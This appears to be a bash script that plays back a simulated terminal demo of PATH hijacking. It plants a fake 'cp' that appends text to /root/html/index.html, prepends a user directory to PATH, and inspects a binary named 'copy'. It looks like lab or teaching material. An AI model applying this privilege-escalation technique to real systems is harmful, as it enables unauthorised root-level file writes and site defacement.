#!/bin/bash

echo -n "vulnerable:2> "
sleep 1
echo "echo -e '#!/bin/bash\\n\\necho \"test ;)\" >> /root/html/index.html' > cp" | pv -qL 10 
bash -c "echo -e '#!/bin/bash\\n\\necho \"test ;)\" >> /root/html/index.html' > cp"
echo -n "vulnerable:2> "
sleep 1
echo "chmod +x cp" | pv -qL 10 
bash -c "chmod +x cp"
echo -n "vulnerable:2> "
sleep 1
echo "export PATH=\"/home/dev_user:\$PATH\"" | pv -qL 10 
bash -c "export PATH=\"/home/dev_user:\$PATH\""
echo -n "vulnerable:2> "
sleep 1
echo "echo \$PATH" | pv -qL 10 
bash -c "echo \$PATH"
echo -n "vulnerable:2> "
sleep 1
echo "which cp" | pv -qL 10 
bash -c "which cp"
echo -n "vulnerable:2> "
sleep 1
echo "strings copy" | pv -qL 10 
bash -c "strings copy"
exit
